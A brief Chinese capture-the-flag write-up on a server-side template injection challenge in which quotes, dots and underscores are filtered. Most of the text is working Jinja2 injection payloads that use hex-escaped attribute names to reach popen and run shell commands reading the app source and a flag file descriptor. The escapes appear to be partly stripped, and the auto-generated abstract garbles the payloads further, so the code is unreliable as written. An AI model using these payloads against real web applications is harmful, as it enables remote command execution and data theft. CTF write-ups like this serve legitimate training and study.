摘要:
明显的ssti过滤单引号、点和下划线直接抛出exp读取源代码{{()[“x5fx5fclassx5fx5f”][“x5fx5fmrox5fx5f”][1][“x5FX 5fsubclasssx5fx5F”]()[127][“X5fx5finitex5fx5f”][”x5fx5fglobals x5fx5f-“][”popen“](“cat%20appx2epy”)[”read“]()}读取标志{(()[
明显的ssti
过滤单引号,点,下划线
直接丢exp了
读源码
{{()["x5fx5fclassx5fx5f"]["x5fx5fmrox5fx5f"][1]["x5fx5fsubclassesx5fx5f"]()[127]["x5fx5finitx5fx5f"]["x5fx5fglobalsx5fx5f"]["popen"]("cat%20appx2epy")["read"]()}}
读flag
{{()["x5fx5fclassx5fx5f"]["x5fx5fmrox5fx5f"][1]["x5fx5fsubclassesx5fx5f"]()[127]["x5fx5finitx5fx5f"]["x5fx5fglobalsx5fx5f"]["popen"]("cat%20/proc/self/fd/3")["read"]()}}
我感觉上面的应该就可以了,不过就是读不出来东西,可能有点细微的差别,用另外一个get_data就可以成功了。